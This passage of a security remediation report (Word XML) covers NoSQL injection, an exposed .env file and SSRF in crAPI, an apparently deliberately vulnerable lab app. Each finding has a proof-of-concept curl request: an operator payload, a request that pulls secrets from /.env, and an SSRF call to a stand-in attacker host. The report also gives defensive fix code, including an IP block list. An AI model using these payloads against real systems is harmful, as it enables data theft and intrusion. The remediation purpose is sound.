        <w:t xml:space="preserve">VULN-03   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL Injection in Coupon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Severity</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CRITICAL</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OWASP Mapping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API8:2019 — Injection</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Service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community-service (Go, MongoDB)</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Endpoint</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POST /community/api/v2/coupon/validate-coupon</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Vulnerable Field</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coupon_code</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Pynt Finding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MongoDB operator object accepted as coupon_code value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The coupon_code field is bound to a Go interface{} and passed unchanged into a bson.M query. An attacker can substitute an operator object (e.g. {"$gt": ""}) for the expected string, causing MongoDB to match any document in the coupon collection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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-X POST 'http://host.docker.internal:8888/community/api/v2/coupon/validate-coupon'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&lt;valid_token&gt;'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'{"coupon_code": {"$gt":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200 OK   returns the first coupon document in the collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the request struct to bind coupon_code as a string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">The current handler binds the body to a map[string]interface{}. Change it to a typed struct with json tags, so non-string values cause a decode error before they reach Mongo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/controllers/couponController.go</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BEFORE (untyped — accepts any JSON value)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var body map[string]interface{}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if err := json.NewDecoder(r.Body).Decode(&amp;body); err != nil { ...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code := body["coupon_code"]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filter := bson.M{"coupon_code": code}   // operator object reaches Mongo</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AFTER (typed struct — JSON object rejected at decode)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type validateCouponReq struct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CouponCode string `json:"coupon_code"`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var req validateCouponReq</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dec := json.NewDecoder(r.Body)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dec.DisallowUnknownFields()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if err := dec.Decode(&amp;req); err != nil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http.Error(w, "Invalid request body", http.StatusBadRequest)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Defence in depth: reject any value that isn't plain alphanumerics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if !regexp.MustCompile(`^[A-Za-z0-9_-]{1,32}$`).MatchString(req.CouponCode)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http.Error(w, "Invalid coupon code format", http.StatusBadRequest)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filter := bson.M{"coupon_code": req.CouponCode}   // safe — string only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add an input-sanitisation middleware that strips $-prefixed keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence in depth: even if a future handler binds to a map type, this middleware removes any top-level key starting with $ before the body is parsed. Apply to the entire community-service router.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/middlewares/noOperatorBody.go</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package middlewares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import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"bytes"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"encoding/json"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"io"</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"net/http"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"strings"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NoMongoOperators rejects request bodies containing keys starting with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func NoMongoOperators(next http.Handler) http.Handler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http.HandlerFunc(func(w http.ResponseWriter, r *http.Request)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r.Body == nil || r.ContentLength == 0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next.ServeHTTP(w, r); return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raw, _ := io.ReadAll(r.Body)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r.Body = io.NopCloser(bytes.NewReader(raw))</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var probe interface{}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err := json.Unmarshal(raw, &amp;probe); err == nil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containsDollarKey(probe)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http.Error(w, "Invalid request: operator keys not allowed",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http.StatusBadRequest)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next.ServeHTTP(w, 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func containsDollarKey(v interface{}) bool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switch t := v.(type)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case map[string]interface{}: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for k, child := range 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strings.HasPrefix(k, "$") { return true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containsDollarKey(child) { return true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case []interface{}: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for _, child := range t { if containsDollarKey(child) { return true }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false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3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Register the middleware on the community-service router</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/community/api/server.go</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In your router setup, wrap protected routes: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router := mux.NewRouter()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router.Use(middlewares.NoMongoOperators)</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existing route registrations ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply MongoDB least-privilege to the community-service user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Limit the database user to read/write on the coupon and posts collections only — not the full database. This caps the damage if a future injection bypasses the input layer.</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In a Mongo shell connected as an admin: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use admin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db.updateUser("crapi_community",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roles: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role: "readWrite", db: "crapi_community", collection: "coupon"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role: "readWrite", db: "crapi_community", collection: "posts"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role: "readWrite", db: "crapi_community", collection: "comments"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5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild and verify with the original payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal: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build crapi-community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up -d crapi-community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1. Operator object — must now be rejected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'http://localhost:8888/community/api/v2/coupon/validate-coupon'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'{"coupon_code": {"$gt":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Expected: 400  (was: 200)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2. Plain string — must still work for a valid coupon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'http://localhost:8888/community/api/v2/coupon/validate-coupon'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'{"coupon_code": "TRAC075"}'</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Expected: 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Any request containing a JSON object as coupon_code must return HTTP 400 before Mongo is touched. Plain-string coupon codes must continue to validate normally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-04   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exposed .env File at Web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Severity</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CRITICAL</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OWASP Mapping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API8:2023 — Security Misconfiguration</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Service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gateway-service (nginx)</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Endpoint</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GET /.env</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Pynt Finding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.env contents returned with HTTP 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The deployment ships a .env file in the gateway's served root and nginx has no rule excluding dot-files, so the entire file is publicly downloadable. The file typically contains DB credentials, JWT secret, mail credentials, and third-party API keys. Every value in it must be treated as compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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-i 'http://host.docker.internal:8888/.env'</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HTTP/1.1 200 OK</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Content-Type: text/plain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POSTGRES_PASSWORD=...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JWT_SECRET=...</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SMTP_PASS=...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotate every secret in the exposed file (do this FIRST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the immediate-priority action — even if nginx is patched, anything the attacker already downloaded is theirs forever. Rotate before you deploy the nginx fix, not after.</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1. Generate a new JWT signing secret (256-bit, base64-encoded)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openssl rand -base64 32</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2. Generate new database password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openssl rand -base64 24</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3. Update the secrets in deploy/docker/.env to the new values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(or, preferably, move them into Docker secrets / Vault — see Step 4)</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4. Force every existing user to re-authenticate by invalidating tokens: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The simplest way is to change JWT_SECRET — all old tokens fail signature check.</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5. Rotate every third-party API key listed in .env at the provider side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(mail provider, payment provider, chatbot LLM key, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deny access to dot-files at the nginx layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a location block that returns 404 for any URI starting with a dot. Place it before any other location block so it always wins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/gateway-service/api-gateway.conf</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server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listen 8888;</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 Add this block at the very top of the server { } scope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location ~ /\.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deny all;</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access_log off;</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log_not_found off;</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404;</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 existing location blocks (proxy_pass to services) follow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3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove .env from the gateway's served content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">The web server should never have the file at all. Audit the gateway's Docker context and ensure .env is excluded from the image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/gateway-service/.dockerignore</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Add or confirm these entries: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.env</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.env.*</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*.env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/gateway-service/Dockerfile</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Make sure no COPY line pulls .env into the image. If one exists, delete it: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BAD — remove if present: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COPY .env /etc/nginx/.env</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Application config (proxy rules, etc.) should be copied explicitly:</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COPY api-gateway.conf /etc/nginx/conf.d/default.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Move secrets out of flat files into Docker secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term fix: secrets should not live in .env on disk. Use Docker secrets (or HashiCorp Vault / AWS Secrets Manager in non-Docker environments) so they are mounted at runtime only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy/docker/docker-compose.yml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secrets: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jwt_secret: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file: ./secrets/jwt_secret.txt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postgres_password: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file: ./secrets/postgres_password.txt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services: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crapi-identity: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secrets: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jwt_secret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postgres_password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environment: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JWT_SECRET_FILE: /run/secrets/jwt_secret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POSTGRES_PASSWORD_FILE: /run/secrets/postgres_password</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application code reads the file at the path in *_FILE env vars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add an automated regression check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a smoke test to CI that requests /.env and asserts 404. This prevents the file from ever being re-exposed by a future config change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/security-smoke.yml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name: Security smoke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on: [push, pull_request]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jobs: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dotenv-not-exposed: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runs-on: ubuntu-latest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steps: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uses: actions/checkout@v4</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name: Start stack</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run: docker compose -f deploy/docker/docker-compose.yml up -d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name: Wait for gateway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run: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for i in {1..30}; do</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curl -fsS http://localhost:8888/ &amp;&amp; break</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sleep 2</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done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name: /.env must not be served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run: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code=$(curl -s -o /dev/null -w '%{http_code}' http://localhost:8888/.env)</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 "$code" != "404" ] &amp;&amp; [ "$code" != "403" ]; then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echo "FAIL: /.env returned $code"; exit 1</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fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rebuild and verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal: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build crapi-gateway-service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up -d crapi-gateway-service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http://localhost:8888/.env</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Expected: 404</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http://localhost:8888/.git/config</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http://localhost:8888/.htaccess</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Expected: 404 on both — confirms the dot-file rule is generic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="70AD47" w:sz="4"/>
          <w:bottom w:val="single" w:color="70AD47" w:sz="4"/>
          <w:left w:val="single" w:color="70AD47" w:sz="16"/>
          <w:right w:val="single" w:color="70AD47" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="E2EFDA" w:val="clear"/>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="385723"/>
        </w:rPr>
        <w:t xml:space="preserve">✔ VERIFY:  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GET /.env must return HTTP 404 (or 403). All secrets that were in the exposed file must be rotated and the old values invalidated on every consuming system before this finding is closed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-05   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF via mechanic_api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Severity</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HIGH</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OWASP Mapping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API7:2023 — Server-Side Request Forgery</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Service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workshop-service (Python/Django)</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Endpoint</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POST /workshop/api/merchant/contact_mechanic</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Vulnerable Field</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mechanic_api</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Pynt Finding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Server makes outbound request to arbitrary attacker-supplied URL (callback confirmed out-of-band)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The contact_mechanic view issues an HTTP request to the URL supplied in the mechanic_api field with no validation. An attacker can supply a URL pointing at cloud metadata (169.254.169.254), internal services, or external infrastructure they control. Two payload styles were confirmed: a direct external URL and a credential-embedded URL of the form https://host.docker.internal:8888@&lt;callback&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (Pynt)</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-X POST 'http://host.docker.internal:8888/workshop/api/merchant/contact_mechanic'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&lt;valid_token&gt;'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"mechanic_code": "TRAC_JHN",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"problem_details": "test",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"vin": "4AGRNV6392LZ82YUR",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"mechanic_api": "https://attacker-callback.example/probe",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"repeat_request_if_failed": false,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"number_of_repeats": 1</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Outbound HTTP request to attacker-callback.example observed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a URL validator that allowlists permitted mechanic hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a small module that resolves the URL, rejects private/loopback/link-local IPs, strips any userinfo component, and checks the host against a configurable allowlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">services/workshop/crapi/mechanic/url_validator.py</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import ipaddress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import socket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from urllib.parse import urlparse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from django.conf import settings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class UnsafeURLError(ValueError):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pass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Configured in settings.py — only these hosts may be contacted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ALLOWED_MECHANIC_HOSTS = getattr(settings, "ALLOWED_MECHANIC_HOSTS", set())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_BLOCKED_NETS =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ipaddress.ip_network("127.0.0.0/8"),</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ipaddress.ip_network("10.0.0.0/8"),</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ipaddress.ip_network("172.16.0.0/12"),</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ipaddress.ip_network("192.168.0.0/16"),</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ipaddress.ip_network("169.254.0.0/16"),    # link-local + IMDS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ipaddress.ip_network("::1/128"),</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ipaddress.ip_network("fc00::/7"),</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ipaddress.ip_network("fe80::/10"),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def validate_mechanic_url(raw_url: str) -&gt; str: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parsed = urlparse(raw_url)</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1. Scheme must be https (or http only for explicit dev override)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parsed.scheme not in ("https",):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raise UnsafeURLError(f"Disallowed scheme: {parsed.scheme}")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2. Reject credential-embedded URLs (https://trusted@attacker)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parsed.username or parsed.password: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raise UnsafeURLError("Credentials in URL are not allowed")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host = parsed.hostname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not host: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raise UnsafeURLError("URL has no hostname")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3. Hostname must be on the allowlist (exact match, not suffix)</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host not in ALLOWED_MECHANIC_HOSTS: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raise UnsafeURLError(f"Host not allowlisted: {host}")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4. Resolve and verify every returned IP is public</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try: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infos = socket.getaddrinfo(host, None)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except socket.gaierror as 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raise UnsafeURLError(f"DNS resolution failed: {e}")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for info in infos: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ip = ipaddress.ip_address(info[4][0])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for net in _BLOCKED_NETS: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ip in net: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raise UnsafeURLError(f"Host resolves to private/loopback IP: {ip}")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Return a sanitised URL string for the caller to use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return parsed._replace(netloc=host + (f":{parsed.port}" if parsed.port else "")).geturl()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
